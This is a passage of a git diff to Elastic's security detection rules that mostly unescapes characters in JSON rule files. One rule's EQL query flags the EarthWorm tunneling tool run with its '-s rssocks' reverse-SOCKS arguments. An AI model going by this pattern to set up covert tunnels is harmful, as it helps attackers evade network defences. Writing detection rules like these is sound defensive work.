"tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_102.json b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_102.json index 413635978bf..95d2c99f1bd 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_102.json +++ b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_103.json b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_103.json index 1dc5ce8eac0..6bcfcd3b5c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_103.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_103.json index 0920d48431d..a0d381acf72 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_103.json @@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_104.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_104.json index 3648175a9af..49e012f432c 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_104.json @@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_105.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_105.json index 01aa15c6848..4031ca6153f 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_105.json @@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_106.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_106.json index 1c12dae77a0..4b404637aee 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_106.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via EarthWorm", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n process.args : \"-s\" and process.args : \"-d\" and process.args : \"rssocks\"\n", "references": [ "http://rootkiter.com/EarthWorm/", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_107.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_107.json index 82837b1fa70..cd0b3fca34d 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_107.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_108.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_108.json index 82ba13a5780..1fd3540c023 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_108.json @@ -43,7 +43,7 @@ ], "risk_score": 47, "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_105.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_105.json index 91ac16bf986..762c2be2814 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_105.json @@ -67,7 +67,7 @@ ], "risk_score": 73, "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_106.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_106.json index 0e7c8c9fe4e..1684034a44d 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_106.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_107.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_107.json index 18fb2a42f3b..a63b19c51e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_107.json +++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_107.json @@ -62,7 +62,7 @@ ], "risk_score": 73, "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", 